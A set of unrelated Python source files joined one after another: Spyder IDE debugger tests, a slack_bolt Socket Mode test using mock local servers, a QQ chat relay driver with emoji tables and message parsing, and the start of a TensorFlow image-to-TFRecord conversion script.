qtbot.wait(1000)
# Assert the editor was filled
editor = list(treewidget.editor_ids.keys())[0]
assert len(treewidget.editor_tree_cache[editor.get_id()]) > 0
# Remove test file from session
CONF.set('editor', 'filenames', [])
@pytest.mark.slow
@flaky(max_runs=3)
def test_prevent_closing(main_window, qtbot):
"""
    Check that a file being debugged can be closed when pdb_prevent_closing is disabled.
"""
code = "print(1 + 6)\nprint(1 + 6)\n"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=1)
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
CONF.set('ipython_console', 'pdb_prevent_closing', False)
# Check we can close a file we debug if the option is disabled
assert main_window.editor.get_current_editorstack().close_file()
CONF.set('ipython_console', 'pdb_prevent_closing', True)
# Check we are still debugging
assert shell.is_debugging()
@pytest.mark.slow
@flaky(max_runs=3)
def test_continue_first_line(main_window, qtbot):
"""
    Check that execution continues past the first line when pdb_stop_first_line is disabled.
"""
code = "print('a =', 1 + 6)\nprint('b =', 1 + 8)\n"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
CONF.set('ipython_console', 'pdb_stop_first_line', False)
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# The debugging should finish
qtbot.waitUntil(lambda: not shell.is_debugging())
CONF.set('ipython_console', 'pdb_stop_first_line', True)
# Check everything was executed
qtbot.waitUntil(lambda: "a = 7" in shell._control.toPlainText())
assert "b = 9" in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_outline_no_init(main_window, qtbot):
# Open file in one of our directories without an __init__ file
spy_dir = osp.dirname(get_module_path('spyder'))
main_window.editor.load(osp.join(spy_dir, 'tools', 'rm_whitespace.py'))
# Show outline explorer
outline_explorer = main_window.outlineexplorer
outline_explorer._toggle_view_action.setChecked(True)
# Wait a bit for trees to be filled
qtbot.wait(5000)
# Get tree length
treewidget = outline_explorer.explorer.treewidget
editor_id = list(treewidget.editor_ids.values())[1]
# Assert symbols in the file are detected and shown
assert len(treewidget.editor_tree_cache[editor_id]) > 0
if __name__ == "__main__":
pytest.main()
|
test_async_websockets.py
|
import asyncio
from threading import Thread
import pytest
from slack_sdk.web.async_client import AsyncWebClient
from slack_bolt.adapter.socket_mode.websockets import AsyncSocketModeHandler
from slack_bolt.app.async_app import AsyncApp
from tests.mock_web_api_server import (
setup_mock_web_api_server,
cleanup_mock_web_api_server,
)
from tests.utils import remove_os_env_temporarily, restore_os_env
from ...adapter_tests.socket_mode.mock_socket_mode_server import (
start_socket_mode_server,
)
class TestSocketModeWebsockets:
valid_token = "xoxb-valid"
mock_api_server_base_url = "http://localhost:8888"
web_client = AsyncWebClient(
token=valid_token,
base_url=mock_api_server_base_url,
)
@pytest.fixture
def event_loop(self):
old_os_env = remove_os_env_temporarily()
try:
setup_mock_web_api_server(self)
loop = asyncio.get_event_loop()
yield loop
loop.close()
cleanup_mock_web_api_server(self)
finally:
restore_os_env(old_os_env)
@pytest.mark.asyncio
async def test_events(self):
t = Thread(target=start_socket_mode_server(self, 3022))
t.daemon = True
t.start()
await asyncio.sleep(1) # wait for the server
app = AsyncApp(client=self.web_client)
result = {"shortcut": False, "command": False}
@app.shortcut("do-something")
async def shortcut_handler(ack):
result["shortcut"] = True
await ack()
@app.command("/hello-socket-mode")
async def command_handler(ack):
result["command"] = True
await ack()
handler = AsyncSocketModeHandler(
app_token="xapp-A111-222-xyz",
app=app,
)
try:
handler.client.wss_uri = "ws://localhost:3022/link"
await handler.connect_async()
await asyncio.sleep(2) # wait for the message receiver
await handler.client.send_message("foo")
await asyncio.sleep(2)
assert result["shortcut"] is True
assert result["command"] is True
finally:
await handler.client.close()
self.server.stop()
self.server.close()
|
driver.py
|
from typing import Dict, List, Union
import threading
import asyncio
import json
from aiocqhttp import CQHttp, MessageSegment
from unified_message_relay.Core.UMRType import UnifiedMessage, MessageEntity, ChatType, EntityType
from unified_message_relay.Core import UMRDriver
from unified_message_relay.Core import UMRLogging
from unified_message_relay.Core.UMRMessageRelation import set_ingress_message_id, set_egress_message_id
from unified_message_relay.Util.Helper import unparse_entities_to_markdown
from unified_message_relay.Core import UMRConfig
from typing_extensions import Literal
from pydantic import Field
import re
import os
qq_emoji_list = { # created by JogleLew and jqqqqqqqqqq, optimized based on Tim's emoji support
0: '😮',
1: '😣',
2: '😍',
3: '😳',
4: '😎',
5: '😭',
6: '☺️',
7: '😷',
8: '😴',
9: '😭',
10: '😰',
11: '😡',
12: '😝',
13: '😃',
14: '🙂',
15: '🙁',
16: '🤓',
17: '[Empty]',
18: '😤',
19: '😨',
20: '😏',
21: '😊',
22: '🙄',
23: '😕',
24: '🤤',
25: '😪',
26: '😨',
27: '😓',
28: '😬',
29: '🤑',
30: '✊',
31: '😤',
32: '🤔',
33: '🤐',
34: '😵',
35: '😩',
36: '💣',
37: '💀',
38: '🔨',
39: '👋',
40: '[Empty]',
41: '😮',
42: '💑',
43: '🕺',
44: '[Empty]',
45: '[Empty]',
46: '🐷',
47: '[Empty]',
48: '[Empty]',
49: '🤷',
50: '[Empty]',
51: '[Empty]',
52: '[Empty]',
53: '🎂',
54: '⚡',
55: '💣',
56: '🔪',
57: '⚽️',
58: '[Empty]',
59: '💩',
60: '☕️',
61: '🍚',
62: '[Empty]',
63: '🌹',
64: '🥀',
65: '[Empty]',
66: '❤️',
67: '💔️',
68: '[Empty]',
69: '🎁',
70: '[Empty]',
71: '[Empty]',
72: '[Empty]',
73: '[Empty]',
74: '🌞️',
75: '🌃',
76: '👍',
77: '👎',
78: '🤝',
79: '✌️',
80: '[Empty]',
81: '[Empty]',
82: '[Empty]',
83: '[Empty]',
84: '[Empty]',
85: '🥰',
86: '[怄火]',
87: '[Empty]',
88: '[Empty]',
89: '🍉',
90: '[Empty]',
91: '[Empty]',
92: '[Empty]',
93: '[Empty]',
94: '[Empty]',
95: '[Empty]',
96: '😅',
97: '[擦汗]',
98: '[抠鼻]',
99: '👏',
100: '[糗大了]',
101: '😏',
102: '😏',
103: '😏',
104: '🥱',
105: '[鄙视]',
106: '😭',
107: '😭',
108: '[阴险]',
109: '😚',
110: '🙀',
111: '[可怜]',
112: '🔪',
113: '🍺',
114: '🏀',
115: '🏓',
116: '❤️',
117: '🐞',
118: '[抱拳]',
119: '[勾引]',
120: '✊',
121: '[差劲]',
122: '🤟',
123: '🚫',
124: '👌',
125: '[转圈]',
126: '[磕头]',
127: '[回头]',
128: '[跳绳]',
129: '👋',
130: '[激动]',
131: '[街舞]',
132: '😘',
133: '[左太极]',
134: '[右太极]',
135: '[Empty]',
136: '[双喜]',
137: '🧨',
138: '🏮',
139: '💰',
140: '[K歌]',
141: '🛍️',
142: '📧',
143: '[帅]',
144: '👏',
145: '🙏',
146: '[爆筋]',
147: '🍭',
148: '🍼',
149: '[下面]',
150: '🍌',
151: '🛩',
152: '🚗',
153: '🚅',
154: '[车厢]',
155: '[高铁右车头]',
156: '🌥',
    157: '[下雨]',
158: '💵',
159: '🐼',
160: '💡',
161: '[风车]',
162: '⏰',
163: '🌂',
164: '[彩球]',
165: '💍',
166: '🛋',
167: '[纸巾]',
168: '💊',
169: '🔫',
170: '🐸',
171: '🍵',
172: '[眨眼睛]',
173: '😭',
174: '[无奈]',
175: '[卖萌]',
176: '[小纠结]',
177: '[喷血]',
178: '[斜眼笑]',
179: '[doge]',
180: '[惊喜]',
181: '[骚扰]',
182: '😹',
183: '[我最美]',
184: '🦀',
185: '[羊驼]',
186: '[Empty]',
187: '👻',
188: '🥚',
189: '[Empty]',
190: '🌼',
191: '[Empty]',
192: '🧧',
193: '😄',
194: '😞',
195: '[Empty]',
196: '[Empty]',
197: '[冷漠]',
198: '[呃]',
199: '👍',
200: '👋',
201: '👍',
202: '[无聊]',
203: '[托脸]',
204: '[吃]',
205: '💐',
206: '😨',
207: '[花痴]',
208: '[小样儿]',
209: '[Empty]',
210: '😭',
211: '[我不看]',
212: '[托腮]',
213: '[Empty]',
214: '😙',
215: '[糊脸]',
216: '[拍头]',
217: '[扯一扯]',
218: '[舔一舔]',
219: '[蹭一蹭]',
220: '[拽炸天]',
221: '[顶呱呱]',
222: '🤗',
223: '[暴击]',
224: '🔫',
225: '[撩一撩]',
226: '[拍桌]',
227: '👏',
228: '[恭喜]',
229: '🍻',
230: '[嘲讽]',
231: '[哼]',
232: '[佛系]',
233: '[掐一掐]',
234: '😮',
235: '[颤抖]',
236: '[啃头]',
237: '[偷看]',
238: '[扇脸]',
239: '[原谅]',
240: '[喷脸]',
241: '🎂',
242: '[Empty]',
243: '[Empty]',
244: '[Empty]',
245: '[Empty]',
246: '[Empty]',
247: '[Empty]',
248: '[Empty]',
249: '[Empty]',
250: '[Empty]',
251: '[Empty]',
252: '[Empty]',
253: '[Empty]',
254: '[Empty]',
255: '[Empty]',
}
# original text copied from Tim
qq_emoji_text_list = {
0: '[惊讶]',
1: '[撇嘴]',
2: '[色]',
3: '[发呆]',
4: '[得意]',
5: '[流泪]',
6: '[害羞]',
7: '[闭嘴]',
8: '[睡]',
9: '[大哭]',
10: '[尴尬]',
11: '[发怒]',
12: '[调皮]',
13: '[呲牙]',
14: '[微笑]',
15: '[难过]',
16: '[酷]',
17: '[Empty]',
18: '[抓狂]',
19: '[吐]',
20: '[偷笑]',
21: '[可爱]',
22: '[白眼]',
23: '[傲慢]',
24: '[饥饿]',
25: '[困]',
26: '[惊恐]',
27: '[流汗]',
28: '[憨笑]',
29: '[悠闲]',
30: '[奋斗]',
31: '[咒骂]',
32: '[疑问]',
33: '[嘘]',
34: '[晕]',
35: '[折磨]',
36: '[衰]',
37: '[骷髅]',
38: '[敲打]',
39: '[再见]',
40: '[Empty]',
41: '[发抖]',
42: '[爱情]',
43: '[跳跳]',
44: '[Empty]',
45: '[Empty]',
46: '[猪头]',
47: '[Empty]',
48: '[Empty]',
49: '[拥抱]',
50: '[Empty]',
51: '[Empty]',
52: '[Empty]',
53: '[蛋糕]',
54: '[闪电]',
55: '[炸弹]',
56: '[刀]',
57: '[足球]',
58: '[Empty]',
59: '[便便]',
60: '[咖啡]',
61: '[饭]',
62: '[Empty]',
63: '[玫瑰]',
64: '[凋谢]',
65: '[Empty]',
66: '[爱心]',
67: '[心碎]',
68: '[Empty]',
69: '[礼物]',
70: '[Empty]',
71: '[Empty]',
72: '[Empty]',
73: '[Empty]',
74: '[太阳]',
75: '[月亮]',
76: '[赞]',
77: '[踩]',
78: '[握手]',
79: '[胜利]',
80: '[Empty]',
81: '[Empty]',
82: '[Empty]',
83: '[Empty]',
84: '[Empty]',
85: '[飞吻]',
86: '[怄火]',
87: '[Empty]',
88: '[Empty]',
89: '[西瓜]',
90: '[Empty]',
91: '[Empty]',
92: '[Empty]',
93: '[Empty]',
94: '[Empty]',
95: '[Empty]',
96: '[冷汗]',
97: '[擦汗]',
98: '[抠鼻]',
99: '[鼓掌]',
100: '[糗大了]',
101: '[坏笑]',
102: '[左哼哼]',
103: '[右哼哼]',
104: '[哈欠]',
105: '[鄙视]',
106: '[委屈]',
107: '[快哭了]',
108: '[阴险]',
109: '[亲亲]',
110: '[吓]',
111: '[可怜]',
112: '[菜刀]',
113: '[啤酒]',
114: '[篮球]',
115: '[乒乓]',
116: '[示爱]',
117: '[瓢虫]',
118: '[抱拳]',
119: '[勾引]',
120: '[拳头]',
121: '[差劲]',
122: '[爱你]',
123: '[NO]',
124: '[OK]',
125: '[转圈]',
126: '[磕头]',
127: '[回头]',
128: '[跳绳]',
129: '[挥手]',
130: '[激动]',
131: '[街舞]',
132: '[献吻]',
133: '[左太极]',
134: '[右太极]',
135: '[Empty]',
136: '[双喜]',
137: '[鞭炮]',
138: '[灯笼]',
139: '[发财]',
140: '[K歌]',
141: '[购物]',
142: '[邮件]',
143: '[帅]',
144: '[喝彩]',
145: '[祈祷]',
146: '[爆筋]',
147: '[棒棒糖]',
148: '[喝奶]',
149: '[下面]',
150: '[香蕉]',
151: '[飞机]',
152: '[开车]',
153: '[高铁左车头]',
154: '[车厢]',
155: '[高铁右车头]',
156: '[多云]',
157: '[下雨]',
158: '[钞票]',
159: '[熊猫]',
160: '[灯泡]',
161: '[风车]',
162: '[闹钟]',
163: '[打伞]',
164: '[彩球]',
165: '[钻戒]',
166: '[沙发]',
167: '[纸巾]',
168: '[药]',
169: '[手枪]',
170: '[青蛙]',
171: '[茶]',
172: '[眨眼睛]',
173: '[泪奔]',
174: '[无奈]',
175: '[卖萌]',
176: '[小纠结]',
177: '[喷血]',
178: '[斜眼笑]',
179: '[doge]',
180: '[惊喜]',
181: '[骚扰]',
182: '[笑哭]',
183: '[我最美]',
184: '[河蟹]',
185: '[羊驼]',
186: '[Empty]',
187: '[幽灵]',
188: '[蛋]',
189: '[Empty]',
190: '[菊花]',
191: '[Empty]',
192: '[红包]',
193: '[大笑]',
194: '[不开心]',
195: '[Empty]',
196: '[Empty]',
197: '[冷漠]',
198: '[呃]',
199: '[好棒]',
200: '[拜托]',
201: '[点赞]',
202: '[无聊]',
203: '[托脸]',
204: '[吃]',
205: '[送花]',
206: '[害怕]',
207: '[花痴]',
208: '[小样儿]',
209: '[Empty]',
210: '[飙泪]',
211: '[我不看]',
212: '[托腮]',
213: '[Empty]',
214: '[啵啵]',
215: '[糊脸]',
216: '[拍头]',
217: '[扯一扯]',
218: '[舔一舔]',
219: '[蹭一蹭]',
220: '[拽炸天]',
221: '[顶呱呱]',
222: '[抱抱]',
223: '[暴击]',
224: '[开枪]',
225: '[撩一撩]',
226: '[拍桌]',
227: '[拍手]',
228: '[恭喜]',
229: '[干杯]',
230: '[嘲讽]',
231: '[哼]',
232: '[佛系]',
233: '[掐一掐]',
234: '[惊呆]',
235: '[颤抖]',
236: '[啃头]',
237: '[偷看]',
238: '[扇脸]',
239: '[原谅]',
240: '[喷脸]',
241: '[生日快乐]',
242: '[Empty]',
243: '[Empty]',
244: '[Empty]',
245: '[Empty]',
246: '[Empty]',
247: '[Empty]',
248: '[Empty]',
249: '[Empty]',
250: '[Empty]',
251: '[Empty]',
252: '[Empty]',
253: '[Empty]',
254: '[Empty]',
255: '[Empty]',
}
qq_sface_list = {
1: '[拜拜]',
2: '[鄙视]',
3: '[菜刀]',
4: '[沧桑]',
5: '[馋了]',
6: '[吃惊]',
7: '[微笑]',
8: '[得意]',
9: '[嘚瑟]',
10: '[瞪眼]',
11: '[震惊]',
12: '[鼓掌]',
13: '[害羞]',
14: '[好的]',
15: '[惊呆了]',
16: '[静静看]',
17: '[可爱]',
18: '[困]',
19: '[脸红]',
20: '[你懂的]',
21: '[期待]',
22: '[亲亲]',
23: '[伤心]',
24: '[生气]',
25: '[摇摆]',
26: '[帅]',
27: '[思考]',
28: '[震惊哭]',
29: '[痛心]',
30: '[偷笑]',
31: '[挖鼻孔]',
32: '[抓狂]',
33: '[笑着哭]',
34: '[无语]',
35: '[捂脸]',
36: '[喜欢]',
37: '[笑哭]',
38: '[疑惑]',
39: '[赞]',
40: '[眨眼]'
}
class QQDriverConfig(UMRConfig.BaseDriverConfig):
Base: Literal['QQ']
Account: int
APIRoot: str
ListenIP: str
ListenPort: int = Field(8080, ge=0, le=65535)
Token: str
Secret: str
IsPro: bool = False
NameforPrivateChat: bool = True
    NameforGroupChat: bool = True
UMRConfig.register_driver_config(QQDriverConfig)
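# Illustrative only (not part of the original driver): a hypothetical in-Python
# construction of the fields declared above. All values are placeholders, and any
# extra fields inherited from BaseDriverConfig are omitted.
#
#     QQDriverConfig(Base='QQ', Account=12345678, APIRoot='http://127.0.0.1:5700',
#                    ListenIP='0.0.0.0', ListenPort=8080, Token='access-token',
#                    Secret='secret', IsPro=False)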
class QQDriver(UMRDriver.BaseDriverMixin):
def __init__(self, name):
super().__init__(name)
self.name = name
self.logger = UMRLogging.get_logger(f'UMRDriver.{self.name}')
self.logger.debug(f'Started initialization for {self.name}')
self.loop: asyncio.AbstractEventLoop = asyncio.new_event_loop()
self.loop.set_exception_handler(self.handle_exception)
self.config: QQDriverConfig = UMRConfig.config.Driver[self.name]
self.bot = CQHttp(api_root=self.config.APIRoot,
access_token=self.config.Token,
secret=self.config.Secret)
##### initializations #####
# get group list
self.group_list: Dict[int, Dict[int, Dict]] = dict() # Dict[group_id, Dict[member_id, member_info]]
# see https://cqhttp.cc/docs/4.13/#/API?id=响应数据23
self.is_coolq_pro = self.config.IsPro # todo initialization on startup
self.stranger_list: Dict[int, str] = dict()
@self.bot.on_message()
async def handle_msg(context):
message_type = context.get("message_type")
chat_id = context.get(f'{message_type}_id', context.get('user_id'))
chat_type = ChatType(message_type)
self.logger.debug(f'Received message: {str(context)}')
unified_message_list = await self.dissemble_message(context)
set_ingress_message_id(src_platform=self.name, src_chat_id=chat_id, src_chat_type=chat_type,
src_message_id=context.get('message_id'), user_id=context.get('user_id'))
for message in unified_message_list:
await self.receive(message)
return {}
@self.bot.on_request()
async def handle_request(context):
self.logger.debug('received request: ' + str(context))
return {}
def start(self):
def run():
asyncio.set_event_loop(self.loop)
self.logger.debug(f'Starting Quart server for {self.name}')
task = self.bot._server_app.run_task(host=self.config.ListenIP,
port=self.config.ListenPort)
self.loop.create_task(task)
self.loop.run_forever()
t = threading.Thread(target=run)
t.daemon = True
UMRDriver.threads.append(t)
t.start()
self.logger.debug(f'Finished initialization for {self.name}')
##### Define send and receive #####
    async def send(self, to_chat: Union[int, str], chat_type: ChatType, message: UnifiedMessage):
        """
        Schedule _send on the driver's event loop from any thread.

        :return: a concurrent.futures.Future wrapping the result of _send
        """
        self.logger.debug('calling real send')
        return asyncio.run_coroutine_threadsafe(self._send(to_chat, chat_type, message), self.loop)
async def _send(self, to_chat: int, chat_type: ChatType, message: UnifiedMessage):
"""
:return:
"""
self.logger.debug('begin processing message')
context = dict()
if chat_type == ChatType.UNSPECIFIED:
self.logger.warning(f'Sending to undefined group or chat {to_chat}')
return
context['message_type'] = f'{chat_type}'
context['message'] = list()
if message.image:
image_name = os.path.basename(message.image)
context['message'].append(MessageSegment.image(image_name))
if (chat_type == ChatType.PRIVATE and self.config.NameforPrivateChat) or \
(chat_type in (ChatType.GROUP, ChatType.DISCUSS) and self.config.NameforGroupChat):
# name logic
if message.chat_attrs.name:
context['message'].append(MessageSegment.text(message.chat_attrs.name))
if message.chat_attrs.reply_to:
context['message'].append(MessageSegment.text(' (➡️️' + message.chat_attrs.reply_to.name + ')'))
if message.chat_attrs.forward_from:
context['message'].append(MessageSegment.text(' (️️↩️' + message.chat_attrs.forward_from.name + ')'))
if message.chat_attrs.name:
context['message'].append(MessageSegment.text(': '))
# at user
if message.send_action.user_id:
context['message'].append(MessageSegment.at(message.send_action.user_id))
context['message'].append(MessageSegment.text(' '))
context['message'].append(MessageSegment.text(message.text))
if chat_type == ChatType.PRIVATE:
context['user_id'] = to_chat
else:
context[f'{chat_type}_id'] = to_chat
self.logger.debug('finished processing message, ready to send')
result = await self.bot.send(context, context['message'])
if message.chat_attrs:
set_egress_message_id(src_platform=message.chat_attrs.platform,
src_chat_id=message.chat_attrs.chat_id,
src_chat_type=message.chat_attrs.chat_type,
src_message_id=message.chat_attrs.message_id,
dst_platform=self.name,
dst_chat_id=to_chat,
dst_chat_type=chat_type,
dst_message_id=result.get('message_id'),
user_id=self.config.Account)
self.logger.debug('finished sending')
return result.get('message_id')
async def get_username(self, user_id: int, chat_id: int, chat_type: ChatType):
if user_id == self.config.Account:
return 'bot'
if user_id == 1000000:
return 'App message'
if chat_type == ChatType.GROUP:
user = await self.bot.get_group_member_info(group_id=chat_id, user_id=user_id)
username = user.get('card')
if not username:
username = user.get('nickname', str(user_id))
else:
user = await self.bot.get_stranger_info(user_id=user_id)
username = user.get('nickname', str(user_id))
if username == 'mpqqnickname':
username = 'TencentBot'
return username
async def dissemble_message(self, context):
# group_id = context.get('group_id')
# user_id = context.get('user_id')
# user = group_list.get(group_id, dict()).get(user_id, dict())
# username = user.get('nickname', str(user_id))
# for i in range(len(context['message'])):
# message = UnifiedMessage(from_platform=self.name, from_chat=group_id, from_user=username,
# message=context.get('raw_message'))
chat_type = ChatType(context.get('message_type'))
if chat_type in ('group', 'discuss'):
chat_id = context.get(f'{chat_type}_id')
else:
chat_id = context.get('user_id')
user_id = context.get('user_id')
message_id = context.get('message_id')
user = context.get('sender')
username = user.get('card')
if not username:
username = user.get('nickname', str(user_id))
message: List[Dict] = context['message']
unified_message = await self.parse_special_message(chat_id, chat_type, username, message_id, user_id, message)
if unified_message:
return [unified_message]
unified_message_list = await self.parse_message(chat_id, chat_type, username, message_id, user_id, message)
return unified_message_list
async def parse_special_message(self, chat_id: int, chat_type: ChatType, username: str, message_id: int, user_id: int,
message: List[Dict[str, Dict[str, str]]]):
if len(message) > 1:
return None
message = message[0]
message_type = message['type']
message = message['data']
unified_message = UnifiedMessage(platform=self.name,
chat_id=chat_id,
chat_type=chat_type,
name=username,
user_id=user_id,
message_id=message_id)
if message_type == 'share':
unified_message.text = 'Shared '
unified_message.text_entities.append(
MessageEntity(start=len(unified_message.text),
end=len(unified_message.text) + len(message['title']),
entity_type=EntityType.LINK,
link=message['url']))
unified_message.text += message['title']
elif message_type == 'rich':
if 'url' in message:
url = message['url']
if url.startswith('mqqapi'):
cq_location_regex = re.compile(r'^mqqapi:.*lat=(.*)&lon=(.*)&title=(.*)&loc=(.*)&.*$')
                    locations = cq_location_regex.findall(message['url'])  # [('lat', 'lon', 'title', 'loc')]
                    lat, lon, title, loc = locations[0]
                    unified_message.text = f'Shared a location: {title}, {loc}, {lat}, {lon}'
else:
unified_message.text = message.get('title', message.get('text'))
unified_message.text_entities.append(
MessageEntity(start=0,
end=len(unified_message.text),
entity_type=EntityType.LINK,
link=message['url']))
elif 'title' in message:
if 'content' in message:
try:
content = json.loads(message['content'])
if 'news' in content:
unified_message.text = 'Shared '
unified_message.text_entities.append(
MessageEntity(start=len(unified_message.text),
end=len(unified_message.text) + len(message['title']),
entity_type=EntityType.LINK,
link=content.get('jumpUrl')))
unified_message.text += message['title'] + ' ' + message.get('desc')
elif 'weather' in content:
unified_message.text = message['title']
else:
self.logger.debug(f'Got miscellaneous rich text message with content: {str(message)}')
unified_message.text = message['title']
except:
self.logger.exception(f'Cannot decode json: {str(message)}')
unified_message.text = message['title']
else:
unified_message.text = message['title']
else:
self.logger.debug(f'Got miscellaneous rich text message: {str(message)}')
unified_message.text = message.get('text', str(message))
elif message_type == 'dice':
unified_message.text = 'Rolled '
unified_message.text_entities.append(
MessageEntity(start=len(unified_message.text),
end=len(unified_message.text) + len(message['type']),
entity_type=EntityType.BOLD))
unified_message.text += message['type']
elif message_type == 'rps':
unified_message.text = 'Played '
played = {'1': 'Rock',
'2': 'Scissors',
'3': 'Paper'}[message['type']]
unified_message.text_entities.append(
MessageEntity(start=len(unified_message.text),
end=len(unified_message.text) + len(played),
entity_type=EntityType.BOLD))
unified_message.text += played
elif message_type == 'shake':
unified_message.text = 'Sent you a shake'
elif message_type == 'music':
if message['type'].startswith('163'):
unified_message.text = 'Shared a music: '
music_title = 'Netease Music'
unified_message.text_entities.append(
MessageEntity(start=len(unified_message.text),
end=len(unified_message.text) + len(music_title),
entity_type=EntityType.LINK,
link=f'https://music.163.com/song?id={message["id"]}'))
                unified_message.text += music_title
elif message['type'].startswith('qq'):
unified_message.text = 'Shared a music: '
                music_title = 'QQ Music'
unified_message.text_entities.append(
MessageEntity(start=len(unified_message.text),
end=len(unified_message.text) + len(music_title),
entity_type=EntityType.LINK,
link=f'https://y.qq.com/n/yqq/song/{message["id"]}_num.html'))
                unified_message.text += music_title
else:
self.logger.debug(f'Got unseen music share message: {str(message)}')
unified_message.text = 'Shared a music: ' + str(message)
elif message_type == 'record':
unified_message.text = 'Unsupported voice record, please view on QQ'
elif message_type == 'bface':
unified_message.text = 'Unsupported big face, please view on QQ'
elif message_type == 'sign':
unified_message.image = message['image']
sign_text = f'Sign at location: {message["location"]} with title: {message["title"]}'
unified_message.text = sign_text
else:
return
return unified_message
async def parse_message(self, chat_id: int, chat_type: ChatType, username: str, message_id: int, user_id: int,
message: List[Dict[str, Dict[str, str]]]):
message_list = list()
unified_message = UnifiedMessage(platform=self.name,
chat_id=chat_id,
chat_type=chat_type,
name=username,
user_id=user_id,
message_id=message_id)
for m in message:
message_type = m['type']
m = m['data']
if message_type == 'image':
# message not empty or contained a image, append to list
if unified_message.text or unified_message.image:
message_list.append(unified_message)
unified_message = UnifiedMessage(platform=self.name,
chat_id=chat_id,
chat_type=chat_type,
name=username,
user_id=user_id,
message_id=message_id)
unified_message.image = m['url']
elif message_type == 'text':
unified_message.text += m['text']
elif message_type == 'at':
target = await self.get_username(int(m['qq']), chat_id, chat_type)
at_user_text = '@' + target
unified_message.text_entities.append(
MessageEntity(start=len(unified_message.text),
end=len(unified_message.text) + len(at_user_text),
entity_type=EntityType.BOLD))
unified_message.text += at_user_text
elif message_type == 'sface':
qq_face = int(m['id']) & 255
if qq_face in qq_sface_list:
unified_message.text += qq_sface_list[qq_face]
else:
unified_message.text += '\u2753' # ❓
elif message_type == 'face':
qq_face = int(m['id'])
if qq_face in qq_emoji_list:
unified_message.text += qq_emoji_list[qq_face]
else:
unified_message.text += '\u2753' # ❓
else:
self.logger.debug(f'Unhandled message type: {str(m)} with type: {message_type}')
message_list.append(unified_message)
return message_list
async def is_group_admin(self, chat_id: int, chat_type: ChatType, user_id: int):
if chat_type != ChatType.GROUP:
return False
if chat_id not in self.group_list:
return False
return self.group_list[chat_id][user_id]['role'] in ('owner', 'admin')
async def is_group_owner(self, chat_id: int, chat_type: ChatType, user_id: int):
if chat_type != ChatType.GROUP:
return False
if chat_id not in self.group_list:
return False
return self.group_list[chat_id][user_id]['role'] == 'owner'
def handle_exception(self, loop, context):
# context["message"] will always be there; but context["exception"] may not
msg = context.get("exception", context["message"])
self.logger.exception('Unhandled exception: ', exc_info=msg)
UMRDriver.register_driver('QQ', QQDriver)
|
build_image_data.py
|
#!/usr/bin/python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If your data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import random
import sys
import threading
from datetime import datetime
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
'Number of threads to preprocess the images.')
# The labels file contains the list of valid labels.
# Assumes that the file contains entries as such:
# dog
# cat
# flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number starting from 0.
tf.app.flags.DEFINE_string('labels_file', '', 'Labels file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
